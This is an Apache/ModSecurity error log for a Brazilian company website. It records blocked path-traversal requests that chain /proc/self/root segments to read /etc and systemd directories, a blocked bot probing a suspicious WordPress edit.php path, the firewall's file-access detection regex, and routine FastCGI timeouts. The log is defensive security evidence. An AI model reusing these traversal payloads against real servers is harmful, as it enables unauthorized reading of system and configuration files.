[Tue Mar 17 19:44:41.412032 2026] [:error] [pid 2598:tid 140411557287680] [client 74.7.241.31:44644] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnZWRj0p0SRWAqcjGGZugAAAxY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:44:43.513202 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.31:40186] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnZW9Y0UrI5A3LftIwe2gAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:44:44.835227 2026] [:error] [pid 29151:tid 140411565680384] [client 74.7.241.31:40192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnZXPPqhzTj3BvfDX-nnAAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:44:46.262992 2026] [:error] [pid 29151:tid 140411716749056] [client 74.7.241.31:40196] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnZXvPqhzTj3BvfDX-nngAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:44:57.117781 2026] [proxy_fcgi:error] [pid 11816:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:45630] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:45:18.129813 2026] [proxy_fcgi:error] [pid 11816:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:45912] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:45:19.964863 2026] [:error] [pid 2598:tid 140411540502272] [client 74.7.241.31:51054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnZfxj0p0SRWAqcjGGZ1AAAAxg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:45:40.129794 2026] [proxy_fcgi:error] [pid 7004:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:46174] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:46:02.161812 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:46428] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:46:03.895565 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:35246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnZq9a6ubjKNq_cu4YnYwAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 19:46:24.137592 2026] [proxy_fcgi:error] [pid 19507:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:46662] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:46:25.355819 2026] [:error] [pid 11088:tid 140411741927168] [client 74.7.243.128:44316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnZwWmqtCojLHvu5cKJlQAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:46:34.541005 2026] [:error] [pid 7004:tid 140411708356352] [client 204.12.208.18:64445] [client 204.12.208.18] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "Firefox/7.0" at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/wp-content/pl2ea67b/edit.php"] [unique_id "abnZysU6Sx0TG1YjmQjPTgAAAoQ"], referer: https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php
[Tue Mar 17 19:46:46.123338 2026] [proxy_fcgi:error] [pid 19507:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:46916] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:47:07.128712 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:47174] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:47:30.369249 2026] [proxy_fcgi:error] [pid 11816:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:47446] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:47:53.137765 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:47936] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:47:54.126633 2026] [mime_magic:error] [pid 7004:tid 140411741927168] (70014)End of file found: [client 74.7.243.128:43594] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/usr/lib/systemd/system
[Tue Mar 17 19:47:54.126940 2026] [access_compat:error] [pid 7004:tid 140411741927168] [client 74.7.243.128:43594] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/usr/lib/systemd/system
[Tue Mar 17 19:48:15.123050 2026] [proxy_fcgi:error] [pid 7004:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:48376] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:48:18.516350 2026] [:error] [pid 6296:tid 140411540502272] [client 74.7.241.31:51600] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnaMnIk7brgkOH-rIWs_AAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:48:27.909942 2026] [mime_magic:error] [pid 7004:tid 140411590858496] (70014)End of file found: [client 74.7.243.128:52336] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/usr/lib/systemd/system/multi-user.target.wants
[Tue Mar 17 19:48:27.910088 2026] [access_compat:error] [pid 7004:tid 140411590858496] [client 74.7.243.128:52336] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/usr/lib/systemd/system/multi-user.target.wants
[Tue Mar 17 19:48:37.110284 2026] [proxy_fcgi:error] [pid 19507:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:48768] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:49:00.065810 2026] [proxy_fcgi:error] [pid 31803:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:49014] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:49:23.127603 2026] [proxy_fcgi:error] [pid 2598:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:49260] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:49:26.371133 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.241.31:41480] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnaduw_le52K8_3pV1tiAAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:49:43.736847 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.241.31:47980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnah9Y0UrI5A3LftIwfGAAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:49:45.283013 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:48980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnaida6ubjKNq_cu4YnqQAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:49:46.121933 2026] [proxy_fcgi:error] [pid 19507:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49578] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:49:48.163395 2026] [:error] [pid 25836:tid 140411725141760] [client 74.7.241.31:51878] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnajIh-PF_25v4hFRCKdAAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:49:57.780398 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:51926] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnaldY0UrI5A3LftIwfGgAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:49:59.987557 2026] [:error] [pid 11088:tid 140411674785536] [client 74.7.241.31:51932] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnal2mqtCojLHvu5cKJzQAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:50:01.500824 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.241.31:51936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnamdY0UrI5A3LftIwfIAAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:50:01.760418 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.241.31:51936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnamdY0UrI5A3LftIwfIQAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:50:06.122439 2026] [:error] [pid 7004:tid 140411574073088] [client 74.7.241.31:51938] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnansU6Sx0TG1YjmQjPmQAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:50:07.839548 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.241.31:34446] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnan-yqAr6etmhZHNpHqQAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:50:08.121822 2026] [proxy_fcgi:error] [pid 11088:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49900] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:50:30.124740 2026] [proxy_fcgi:error] [pid 11816:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:50216] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:50:52.120899 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50550] AH01075: Error dispatching request to : (polling)
